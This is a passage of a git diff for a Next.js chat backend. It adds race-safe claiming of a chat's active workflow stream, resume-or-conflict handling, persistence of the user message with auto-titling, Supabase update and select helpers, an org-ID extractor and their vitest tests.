Do not include line numbers or ranges.", + "- Do not use this format for URLs or anything that is not a real workspace file path.", + "- If you are not sure of the exact file path, do not invent one.", +].join("\n"); diff --git a/lib/chat/compareAndSetChatActiveStreamId.ts b/lib/chat/compareAndSetChatActiveStreamId.ts new file mode 100644 index 000000000..b3b218245 --- /dev/null +++ b/lib/chat/compareAndSetChatActiveStreamId.ts @@ -0,0 +1,49 @@ +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +/** + * Result of the CAS attempt. Forces callers to distinguish: + * + * - `{ ok: true, claimed: true }` — the row matched the expected value and + * was updated to `next`. + * - `{ ok: true, claimed: false }` — predicate didn't match (a race was + * lost OR the row's `active_stream_id` is in some other state). + * - `{ ok: false, error }` — Supabase / network failure. Distinct from + * "race lost" so callers don't return a misleading 409 when the DB is + * actually unhealthy. + */ +export type CasChatActiveStreamIdResult = + | { ok: true; claimed: boolean } + | { ok: false; error: string }; + +/** + * Atomically swap `chats.active_stream_id` from `expected` to `next` for + * the given chat. Domain wrapper over the generic `updateChat` helper — + * keeps the CAS-on-active_stream_id concept here (in the chat domain) + * rather than in the Supabase plumbing. + * + * Used by `/api/chat/workflow` to: + * - Claim the slot before `start(workflow)` (`expected: null`, `next: "pending-"`). + * - Promote the placeholder to the real run id after start. + * - Release a stale slot in `reconcileExistingActiveStream`. + * + * @param chatId - Target chat id. + * @param expected - The value `active_stream_id` must currently hold (null to + * require an unset slot). + * @param next - The value to write (null to release the slot). 
+ */ +export async function compareAndSetChatActiveStreamId( + chatId: string, + expected: string | null, + next: string | null, +): Promise { + const result = await updateChat( + { id: chatId, where: { active_stream_id: expected } }, + { active_stream_id: next }, + ); + + if ("error" in result) { + return { ok: false, error: result.error }; + } + + return { ok: true, claimed: result.rowsUpdated > 0 }; +} diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts index 137f699cb..dcaad8585 100644 --- a/lib/chat/handleChatWorkflowStream.ts +++ b/lib/chat/handleChatWorkflowStream.ts @@ -1,31 +1,56 @@ import { NextRequest, NextResponse } from "next/server"; -import { createUIMessageStream, createUIMessageStreamResponse } from "ai"; +import { createUIMessageStreamResponse, type UIMessageChunk } from "ai"; +import { start, getRun } from "workflow/api"; import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream"; import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; +import { buildActiveLifecycleUpdate } from "@/lib/sandbox/buildActiveLifecycleUpdate"; +import { updateSession } from "@/lib/supabase/sessions/updateSession"; +import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage"; import { errorResponse } from "@/lib/networking/errorResponse"; import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow"; import generateUUID from "@/lib/uuid/generateUUID"; +const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5"; + /** * Handles POST /api/chat/workflow. 
* - * Stub implementation: delegates auth + body validation to validateChatWorkflow, - * verifies ownership of the referenced session + chat, confirms the session's - * sandbox is active, then returns a hardcoded UIMessage stream with an - * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive - * the agent loop is wired up in a follow-up PR — this stub exists so clients - * can integrate against the contract documented at - * /api-reference/chat/workflow. + * Wires the chat UI to a durable Vercel Workflow agent loop. Flow: + * + * 1. Validate auth + body (validateChatWorkflow). + * 2. Verify session + chat ownership; ensure the session has an active sandbox. + * 3. If a workflow is already running for this chat, resume / 409 via + * maybeResumeChatStream (extracted for OCP). + * 4. **Claim `chats.active_stream_id` BEFORE starting the workflow** using + * a `pending-` placeholder CAS. Closes the race window where two + * concurrent requests could both call `start()` and bill the model + * before one loses the CAS. + * 5. Refresh the session's lifecycle-activity timestamp + fire-and-forget + * persist the latest user message. + * 6. start(runAgentWorkflow). Promote the placeholder to the real run id via + * CAS; if the promotion fails, cancel the just-started run and return 409. + * 7. Return the workflow's UIMessage stream with x-workflow-run-id header. + * + * If we lost the placeholder CAS in step 4, the slot is already held by + * another in-flight or pending request → 409 (no workflow was started, so + * nothing to cancel). * - * @param request - The incoming NextRequest - * @returns A streaming Response (200) or a NextResponse error. + * Tools/sandbox passing is intentionally not wired here yet — the follow-up + * PR ports the @open-harness/agent tool surface into api. + * + * @param request - The incoming NextRequest. + * @returns A streaming 200 Response or a NextResponse error. 
*/ export async function handleChatWorkflowStream(request: NextRequest): Promise { const validated = await validateChatWorkflow(request); if (validated instanceof NextResponse) return validated; + // Session + ownership + sandbox active const sessions = await selectSessions({ id: validated.sessionId }); if (sessions === null) return errorResponse("Internal server error", 500); const session = sessions[0]; @@ -33,29 +58,56 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise { - const id = generateUUID(); - writer.write({ type: "text-start", id }); - writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" }); - writer.write({ type: "text-end", id }); + // We own the slot — safe to start the workflow. + await updateSession(validated.sessionId, buildActiveLifecycleUpdate(session.sandbox_state)); + void persistLatestUserMessage(validated.chatId, validated.messages as never); + + const modelId = chat.model_id ?? DEFAULT_MODEL_ID; + const run = await start(runAgentWorkflow, [ + { + messages: validated.messages, + chatId: validated.chatId, + sessionId: validated.sessionId, + modelId, }, - }); + ]); + + // Promote placeholder → real run id via CAS. If something asynchronously + // stole the slot (or the DB went down) we cancel the workflow we just + // started since another stream now owns the client. 
+ const promoted = await compareAndSetChatActiveStreamId(validated.chatId, placeholder, run.runId); + if (!promoted.ok || !promoted.claimed) { + try { + await getRun(run.runId).cancel(); + } catch (error) { + console.error("[handleChatWorkflowStream] cancel after slot-loss failed:", error); + } + return errorResponse("Another workflow is already running for this chat", 409); + } return createUIMessageStreamResponse({ - stream, - headers: { - ...getCorsHeaders(), - "x-workflow-run-id": runId, - }, + stream: run.getReadable(), + headers: { ...getCorsHeaders(), "x-workflow-run-id": run.runId }, }); } diff --git a/lib/chat/maybeResumeChatStream.ts b/lib/chat/maybeResumeChatStream.ts new file mode 100644 index 000000000..209113fbf --- /dev/null +++ b/lib/chat/maybeResumeChatStream.ts @@ -0,0 +1,40 @@ +import { createUIMessageStreamResponse, type UIMessageChunk } from "ai"; +import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; + +/** + * Encapsulates the "is there already a workflow for this chat?" branch of + * the POST /api/chat/workflow handler. + * + * - If `activeStreamId` is unset (or a finished run's stale id was just + * cleared) → returns `null`; handler proceeds with a fresh workflow. + * - If a workflow is alive → returns a streaming `Response` that pipes + * the existing run's readable back to the client. + * - If the run's state can't be confirmed, or clearing the stale id fails + * or loses a race → returns a 409 `Response`. + * + * Extracted from the handler so the orchestration stays small and the + * resume-vs-conflict logic can grow independently. 
+ */ +export async function maybeResumeChatStream( + chatId: string, + activeStreamId: string | null, +): Promise { + if (!activeStreamId) return null; + + const reconciled = await reconcileExistingActiveStream(chatId, activeStreamId); + + if (reconciled.action === "resume") { + return createUIMessageStreamResponse({ + stream: reconciled.stream as ReadableStream, + headers: { ...getCorsHeaders(), "x-workflow-run-id": reconciled.runId }, + }); + } + + if (reconciled.action === "conflict") { + return errorResponse("Another workflow is already running for this chat", 409); + } + + return null; // action: "ready" — caller starts a new workflow. +} diff --git a/lib/chat/persistLatestUserMessage.ts b/lib/chat/persistLatestUserMessage.ts new file mode 100644 index 000000000..73c06f5ef --- /dev/null +++ b/lib/chat/persistLatestUserMessage.ts @@ -0,0 +1,84 @@ +import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage"; +import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +type TextPart = { type: "text"; text: string }; +type UserMessage = { id: string; role: string; parts: Array }; + +const TITLE_MAX_LENGTH = 80; +const TRUNCATION_SUFFIX = "…"; +const TITLE_BODY_BUDGET = TITLE_MAX_LENGTH - TRUNCATION_SUFFIX.length; + +/** + * Fire-and-forget persistence of the latest user message in a chat-workflow + * request. Called before `start(runAgentWorkflow, ...)` so that: + * + * - A page refresh during workflow queue time still shows the user message. + * - The chat's `updated_at` reflects activity even if the workflow hasn't + * produced its first chunk yet. + * - The chat title is set from the first user message (capped at 80 chars + * including the truncation suffix, addressing the prior off-by-3 bug). + * + * Title-eligibility uses "earliest message in the chat", not "only message", + * so a fast-following second message can't race past the title-set. 
+ * + * All failures are caught and logged — this MUST NOT block the request path. + * + * @param chatId - The target chat. + * @param messages - The full message list from the request body. + */ +export async function persistLatestUserMessage( + chatId: string, + messages: UserMessage[], +): Promise { + try { + const latest = messages[messages.length - 1]; + if (!latest || latest.role !== "user") return; + + const inserted = await upsertChatMessage({ + id: latest.id, + chat_id: chatId, + role: "user", + parts: latest as never, + }); + + // Bail on DB errors (already logged). Don't touch the chat or set a title + // since we can't confirm the message landed. + if (!inserted.ok) return; + + // If it was a duplicate, the original insert already drove side effects. + if (inserted.isDuplicate || inserted.row === null) return; + + await updateChat({ id: chatId }, { updated_at: new Date().toISOString() }); + + // Title-set is gated on "is this row still the earliest message in the chat?" + // — a fast follow-up message that landed before this query wouldn't shift + // the earliest row's id, so we'd still title from this message correctly, + // and racing in the opposite direction (this message landed second) gives + // us a different id at position 0 and we correctly skip. + const earliest = await selectChatMessages({ + chatId, + orderBy: { createdAt: "asc" }, + limit: 1, + }); + + // DB-error or no rows — bail without titling. + if (!earliest || earliest.length === 0) return; + if (earliest[0]?.id !== inserted.row.id) return; + + const text = latest.parts + .filter((part): part is TextPart => part.type === "text") + .map(part => part.text) + .join(" ") + .trim(); + if (text.length === 0) return; + + const title = + text.length > TITLE_MAX_LENGTH + ? 
`${text.slice(0, TITLE_BODY_BUDGET)}${TRUNCATION_SUFFIX}` + : text; + await updateChat({ id: chatId }, { title }); + } catch (error) { + console.error("[persistLatestUserMessage] error:", error); + } +} diff --git a/lib/chat/reconcileExistingActiveStream.ts b/lib/chat/reconcileExistingActiveStream.ts new file mode 100644 index 000000000..4ab004493 --- /dev/null +++ b/lib/chat/reconcileExistingActiveStream.ts @@ -0,0 +1,56 @@ +import { getRun } from "workflow/api"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; + +export type ReconcileResult = + | { action: "resume"; runId: string; stream: ReadableStream } + | { action: "ready" } + | { action: "conflict" }; + +const RUNNING_STATUSES = new Set(["running", "pending"]); + +/** + * Resolves what to do when `chats.active_stream_id` is already set at the + * start of a new chat-workflow request. + * + * - If the referenced workflow run is alive (`running` | `pending`) → + * `action: "resume"` with the existing readable. Caller pipes it back to + * the client. + * - If the run is terminally done AND we win the CAS to clear the stale id + * → `action: "ready"`. Caller starts a fresh workflow. + * - **Anything else** (workflow API throws, CAS-clear loses the race, CAS + * reports a DB error) → `action: "conflict"`. Surfaces as 409 upstream. + * + * Safer-than-open-agents error semantics: a transient `workflow/api` failure + * does NOT clear the stale stream id (which previously created a window for + * duplicate runs). When we can't confidently say "this stream is dead", we + * refuse to start a new one. Eventually the real run completes, a subsequent + * request observes that, clears the slot, and unblocks. + */ +export async function reconcileExistingActiveStream( + chatId: string, + activeStreamId: string, +): Promise { + // Probe the workflow status. Any thrown error here is treated as transient — + // we keep the slot held rather than risk starting a duplicate run. 
+ let status: string; + try { + const existingRun = getRun(activeStreamId); + status = await existingRun.status; + if (RUNNING_STATUSES.has(status)) { + return { action: "resume", runId: activeStreamId, stream: existingRun.getReadable() }; + } + } catch (error) { + console.error("[reconcileExistingActiveStream] getRun failed; treating as conflict:", error); + return { action: "conflict" }; + } + + // Run is terminally done. Attempt to clear the stale id via CAS. If we + // win → ready. Anything else (race lost OR DB error) → conflict, so we + // never accidentally start a duplicate workflow on the back of a failed + // read. + const cleared = await compareAndSetChatActiveStreamId(chatId, activeStreamId, null); + if (cleared.ok && cleared.claimed) { + return { action: "ready" }; + } + return { action: "conflict" }; +} diff --git a/lib/chat/recoupApiSkillPrompt.ts b/lib/chat/recoupApiSkillPrompt.ts new file mode 100644 index 000000000..93f4d2e39 --- /dev/null +++ b/lib/chat/recoupApiSkillPrompt.ts @@ -0,0 +1,11 @@ +/** + * Always-on nudge appended to the agent's system instructions. Points + * at the `recoup-api` and `artist-workspace` skills so prompts about + * anything owned by the user's Recoup account reliably load the right + * playbook — either the filesystem (for sandbox inventory and create- + * artist scaffolding) or the API (for live data) — instead of the + * agent guessing endpoint paths or interpreting overloaded nouns like + * "tasks" as generic repo TODOs. + */ +export const recoupApiSkillPrompt = + 'If you\'re asked about anything belonging to their Recoup account — artists, socials, orgs, research, tasks, chats, pulses, notifications, subscriptions, or any other resource visible at recoup-api.vercel.app / developers.recoupable.com — pick the right skill first instead of guessing. 
For inventory questions about this sandbox ("what artists / orgs do I have", "list my artists", "what\'s in here") load `artist-workspace` — the `artists/{artist-slug}/RECOUP.md` tree is authoritative for this sandbox (the sandbox is already org-scoped — its repo IS the org — so artists live at the top level, not under an `orgs/` directory) and the API is not. For create-artist intents ("create artist", "onboard X", "add an artist", "set up a new artist") also load `artist-workspace` first — it scaffolds the artist\'s `RECOUP.md` as a checklist file you tick off step-by-step, which is what keeps the 8-step chain from dropping steps when run from a sandbox; the curl-by-curl reference for each step lives via `recoup-api` (developers.recoupable.com/workflows/create-artist), but the checklist file is the source of truth for what\'s done. For live data (socials, posts, metrics, research, tasks, notifications) or anything not in the tree, load `recoup-api` — and when `RECOUP_ORG_ID` is set in the env, scope list endpoints to that org (`/api/organizations/$RECOUP_ORG_ID/...`, `--org $RECOUP_ORG_ID` on the CLI) so you get results for the sandbox\'s org, not every org the user belongs to. 
Treat ambiguous account-data questions as Recoup questions by default, not repo-level TODOs.'; diff --git a/lib/recoupable/__tests__/extractOrgId.test.ts b/lib/recoupable/__tests__/extractOrgId.test.ts new file mode 100644 index 000000000..c38232c4c --- /dev/null +++ b/lib/recoupable/__tests__/extractOrgId.test.ts @@ -0,0 +1,57 @@ +import { describe, it, expect } from "vitest"; +import { extractOrgId } from "@/lib/recoupable/extractOrgId"; + +describe("extractOrgId", () => { + it("extracts the UUID tail from a full clone URL", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a", + ), + ).toBe("cebcc866-34c3-451c-8cd7-f63309acff0a"); + }); + + it("strips a .git suffix before extracting", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6.git", + ), + ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6"); + }); + + it("tolerates a trailing slash on the URL", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6/", + ), + ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6"); + }); + + it("accepts an already-extracted repo name", () => { + expect(extractOrgId("org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a")).toBe( + "cebcc866-34c3-451c-8cd7-f63309acff0a", + ); + }); + + it("lowercases an uppercase UUID", () => { + expect(extractOrgId("org-myco-wtf-80263819-9DFD-4BBF-9371-60A6185122D6")).toBe( + "80263819-9dfd-4bbf-9371-60a6185122d6", + ); + }); + + it("returns null for non-Recoupable clone URLs", () => { + expect( + extractOrgId( + "https://github.com/someone-else/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6", + ), + ).toBeNull(); + }); + + it("returns null when the repo name has no UUID tail", () => { + expect(extractOrgId("org-rostrum-pacific")).toBeNull(); + }); + + it("returns null for malformed strings", () => { + expect(extractOrgId("")).toBeNull(); + 
+ expect(extractOrgId("not-a-url-or-repo")).toBeNull(); + }); +}); diff --git a/lib/recoupable/extractOrgId.ts b/lib/recoupable/extractOrgId.ts new file mode 100644 index 000000000..ac30985c5 --- /dev/null +++ b/lib/recoupable/extractOrgId.ts @@ -0,0 +1,31 @@ +import { extractOrgRepoName } from "@/lib/recoupable/extractOrgRepoName"; + +const UUID_TAIL_PATTERN = /-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$/i; + +/** + * Extracts the organization UUID from a Recoupable org clone URL or + * repo name. Recoupable orgs follow the convention `org-{slug}-{uuid}` + * in their GitHub repo names, so the UUID is always the trailing 36 chars. + * + * Used by the chat workflow handler to derive `recoupOrgId` from the + * session's clone URL — the `recoup-api` skill scopes calls to this org + * so sandbox agents see results for the sandbox's org rather than every + * org the user belongs to. + * + * @param cloneUrlOrRepoName - Either the full clone URL + * (`https://github.com/recoupable/org-foo-{uuid}`) or the already-extracted + * repo name (`org-foo-{uuid}`). + * @returns The lowercased UUID, or `null` for anything that doesn't match. + */ +export function extractOrgId(cloneUrlOrRepoName: string): string | null { + const repoName = cloneUrlOrRepoName.startsWith("http") + ? extractOrgRepoName(cloneUrlOrRepoName) + : cloneUrlOrRepoName; + + if (!repoName) { + return null; + } + + const match = repoName.match(UUID_TAIL_PATTERN); + return match?.[1]?.toLowerCase() ?? 
null; +} diff --git a/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts new file mode 100644 index 000000000..c973f24df --- /dev/null +++ b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts @@ -0,0 +1,58 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages"; + +const selectChain = vi.fn(); +const eqChain = vi.fn(); +const orderChain = vi.fn(); +const limitChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ select: selectChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + // Allow any number of chained .eq() / .order() / .limit() calls — they all + // return the same fluent builder. + const builder = { eq: eqChain, order: orderChain, limit: limitChain }; + selectChain.mockReturnValue(builder); + eqChain.mockReturnValue(builder); + orderChain.mockReturnValue(builder); + limitChain.mockReturnValue(builder); +}); + +describe("selectChatMessages", () => { + it("returns rows on success", async () => { + limitChain.mockResolvedValue({ data: [{ id: "m-1" }], error: null }); + const result = await selectChatMessages({ + chatId: "c-1", + orderBy: { createdAt: "asc" }, + limit: 1, + }); + expect(result).toEqual([{ id: "m-1" }]); + expect(eqChain).toHaveBeenCalledWith("chat_id", "c-1"); + expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: true }); + expect(limitChain).toHaveBeenCalledWith(1); + }); + + it("returns null on Supabase error (so callers can distinguish from empty)", async () => { + // With no filters, the terminal call is on selectChain itself + selectChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await selectChatMessages({}); + expect(result).toBeNull(); + }); + + it("returns [] on no match", async () => { + limitChain.mockResolvedValue({ data: [], 
error: null }); + const result = await selectChatMessages({ chatId: "c-1", limit: 1 }); + expect(result).toEqual([]); + }); + + it("applies desc ordering when requested", async () => { + limitChain.mockResolvedValue({ data: [], error: null }); + await selectChatMessages({ chatId: "c-1", orderBy: { createdAt: "desc" }, limit: 1 }); + expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: false }); + }); +}); diff --git a/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts new file mode 100644 index 000000000..0ea559058 --- /dev/null +++ b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts @@ -0,0 +1,46 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage"; + +const upsertChain = vi.fn(); +const selectChain = vi.fn(); +const maybeSingleChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ upsert: upsertChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + upsertChain.mockReturnValue({ select: selectChain }); + selectChain.mockReturnValue({ maybeSingle: maybeSingleChain }); +}); + +const data = { + id: "msg-1", + chat_id: "chat-1", + role: "user" as const, + parts: [{ type: "text", text: "hi" }], +}; + +describe("upsertChatMessage", () => { + it("returns ok:true with the row and isDuplicate:false on new insert", async () => { + maybeSingleChain.mockResolvedValue({ data, error: null }); + const result = await upsertChatMessage(data); + expect(result).toEqual({ ok: true, row: data, isDuplicate: false }); + expect(upsertChain).toHaveBeenCalledWith(data, { onConflict: "id", ignoreDuplicates: true }); + }); + + it("returns ok:true with isDuplicate:true when the id already existed", async () => { + maybeSingleChain.mockResolvedValue({ data: null, error: null }); + const result = await upsertChatMessage(data); + 
expect(result).toEqual({ ok: true, row: null, isDuplicate: true }); + }); + + it("returns ok:false with error on Supabase failure (distinct from duplicate)", async () => { + maybeSingleChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await upsertChatMessage(data); + expect(result).toEqual({ ok: false, error: "down" }); + }); +}); diff --git a/lib/supabase/chat_messages/selectChatMessages.ts b/lib/supabase/chat_messages/selectChatMessages.ts new file mode 100644 index 000000000..ff2ceae24 --- /dev/null +++ b/lib/supabase/chat_messages/selectChatMessages.ts @@ -0,0 +1,40 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables } from "@/types/database.types"; + +export type SelectChatMessagesFilter = { + id?: string; + chatId?: string; + /** Order by `created_at` in this direction (ties broken by `id`). Omit to apply no ordering. */ + orderBy?: { createdAt: "asc" | "desc" }; + /** Maximum rows to return. Omit for no limit. */ + limit?: number; +}; + +/** + * Generic `chat_messages` reader mirroring the `selectChats` / `selectSessions` + * pattern. Returns rows on success, `[]` on no match, or `null` on Supabase + * error so callers can distinguish "nothing here" from "DB unreachable". + * + * Domain-specific questions ("is this the first message in the chat?") live + * in wrapper helpers under `lib/chat/` — keep this file focused on the + * read primitive. 
+ */ +export async function selectChatMessages( + filter: SelectChatMessagesFilter = {}, +): Promise[] | null> { + let query = supabase.from("chat_messages").select("*"); + if (filter.id) query = query.eq("id", filter.id); + if (filter.chatId) query = query.eq("chat_id", filter.chatId); + if (filter.orderBy) { + query = query.order("created_at", { ascending: filter.orderBy.createdAt === "asc" }); + query = query.order("id", { ascending: true }); + } + if (filter.limit !== undefined) query = query.limit(filter.limit); + + const { data, error } = await query; + if (error) { + console.error("[selectChatMessages] error:", error); + return null; + } + return data ?? []; +} diff --git a/lib/supabase/chat_messages/upsertChatMessage.ts b/lib/supabase/chat_messages/upsertChatMessage.ts new file mode 100644 index 000000000..d98b9b343 --- /dev/null +++ b/lib/supabase/chat_messages/upsertChatMessage.ts @@ -0,0 +1,37 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables, TablesInsert } from "@/types/database.types"; + +/** + * Discriminated result so callers can distinguish: + * - `{ ok: true, row, isDuplicate }` — known outcome; row is null when the + * existing `id` conflict was silently ignored. + * - `{ ok: false, error }` — Supabase failure. Visible to logs so transient + * DB problems aren't masked as duplicates. + */ +export type UpsertChatMessageResult = + | { ok: true; row: Tables<"chat_messages"> | null; isDuplicate: boolean } + | { ok: false; error: string }; + +/** + * Insert-or-skip a single chat message row. Wraps Supabase upsert with + * `ignoreDuplicates: true` on the `id` primary key, but returns a + * discriminated result so callers can tell "duplicate skipped" apart from + * "DB error" — the previous helper returned `null` for both, which made + * callers silently swallow operational failures. 
+ */ +export async function upsertChatMessage( + data: TablesInsert<"chat_messages">, +): Promise { + const { data: row, error } = await supabase + .from("chat_messages") + .upsert(data, { onConflict: "id", ignoreDuplicates: true }) + .select() + .maybeSingle(); + + if (error) { + console.error("[upsertChatMessage] error:", error); + return { ok: false, error: error.message }; + } + + return { ok: true, row, isDuplicate: row === null }; +} diff --git a/lib/supabase/chats/__tests__/updateChat.test.ts b/lib/supabase/chats/__tests__/updateChat.test.ts new file mode 100644 index 000000000..a0edc247b --- /dev/null +++ b/lib/supabase/chats/__tests__/updateChat.test.ts @@ -0,0 +1,110 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +const updateChain = vi.fn(); +const eqChain = vi.fn(); +const matchChain = vi.fn(); +const isChain = vi.fn(); +const selectChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ update: updateChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + // Fluent builder mock — every method returns the same builder so we can + // chain .eq / .match / .is / .select in any order without per-step setup. 
+ const builder = { eq: eqChain, match: matchChain, is: isChain, select: selectChain }; + updateChain.mockReturnValue(builder); + eqChain.mockReturnValue(builder); + matchChain.mockReturnValue(builder); + isChain.mockReturnValue(builder); +}); + +describe("updateChat", () => { + describe("plain update (no where predicate)", () => { + it("returns ok:true with rowsUpdated and the row on success", async () => { + const row = { id: "chat-1", title: "renamed" }; + selectChain.mockResolvedValue({ data: [row], error: null }); + const result = await updateChat({ id: "chat-1" }, { title: "renamed" }); + expect(result.ok).toBe(true); + if (!result.ok) return; + expect(result.rowsUpdated).toBe(1); + expect(result.row).toEqual(row); + expect(updateChain).toHaveBeenCalledWith({ title: "renamed" }); + expect(eqChain).toHaveBeenCalledWith("id", "chat-1"); + // With no where filter, match is called with an empty object. + expect(matchChain).toHaveBeenCalledWith({}); + }); + + it("returns ok:false with error on Supabase failure", async () => { + selectChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await updateChat({ id: "chat-x" }, { title: "x" }); + expect(result.ok).toBe(false); + if (result.ok) return; + expect(result.error).toBe("down"); + }); + }); + + describe("generic where predicate", () => { + it("emits `is null` for null values (e.g. CAS expecting unset)", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(isChain).toHaveBeenCalledWith("active_stream_id", null); + // No non-null fields → match called with empty {} + expect(matchChain).toHaveBeenCalledWith({}); + }); + + it("emits `match()` for non-null values (e.g. 
CAS expecting a specific run id)", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: "wrun_old" } }, + { active_stream_id: "wrun_new" }, + ); + expect(matchChain).toHaveBeenCalledWith({ active_stream_id: "wrun_old" }); + // No null fields → is() not called + expect(isChain).not.toHaveBeenCalled(); + }); + + it("AND-s nullable + equality where columns together", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: null, model_id: "anthropic/claude-haiku-4.5" } }, + { title: "x" }, + ); + expect(isChain).toHaveBeenCalledWith("active_stream_id", null); + expect(matchChain).toHaveBeenCalledWith({ model_id: "anthropic/claude-haiku-4.5" }); + }); + + it("returns ok:true rowsUpdated:0 when the predicate matches no row (race lost)", async () => { + selectChain.mockResolvedValue({ data: [], error: null }); + const result = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(result).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 })); + }); + + it("differentiates 'race lost' (ok:true,rows:0) from 'DB error' (ok:false)", async () => { + selectChain.mockResolvedValueOnce({ data: [], error: null }); + const raceLost = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(raceLost).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 })); + + selectChain.mockResolvedValueOnce({ data: null, error: { message: "down" } }); + const dbError = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(dbError).toEqual(expect.objectContaining({ ok: false, error: "down" })); + }); + }); +}); diff --git a/lib/supabase/chats/updateChat.ts b/lib/supabase/chats/updateChat.ts new file mode 100644 
index 000000000..63cd2064b --- /dev/null +++ b/lib/supabase/chats/updateChat.ts @@ -0,0 +1,86 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables, TablesUpdate } from "@/types/database.types"; + +/** + * Subset of `chats` columns that callers are permitted to mutate via this + * helper. Explicitly excludes structural fields (`id`, `session_id`, + * `created_at`) so generic updates cannot bypass chat invariants. + */ +export type ChatMutableFields = Pick< + TablesUpdate<"chats">, + "title" | "model_id" | "updated_at" | "active_stream_id" | "last_assistant_message_at" +>; + +/** + * Filter accepted by {@link updateChat}. Always matches by `id`. Optional + * `where` adds AND-ed predicates per column — generic across columns so + * domain-specific concerns (e.g. CAS on `active_stream_id`) stay in their + * own wrapper helpers rather than baking into the Supabase plumbing. + * + * Each `where` entry maps to `column = value` (or `column IS NULL` when + * `value === null`). + */ +export type UpdateChatFilter = { + id: string; + where?: Partial>; +}; + +/** + * Discriminated result so callers can distinguish: + * - `{ ok: true, rowsUpdated: 1 }` — updated as intended. + * - `{ ok: true, rowsUpdated: 0 }` — the predicate matched zero rows (a CAS + * race lost, or `id` not found). + * - `{ ok: false, error }` — Supabase / network failure. + */ +export type UpdateChatResult = + | { ok: true; rowsUpdated: number; row: Tables<"chats"> | null } + | { ok: false; error: string }; + +/** + * Updates a `chats` row by id, optionally constrained by a generic `where` + * predicate. Returns a discriminated result so callers can tell + * "predicate didn't match" (a race lost) from "Supabase failure" (operational + * issue) — the previous behavior of returning `false` for both was a CAS bug. 
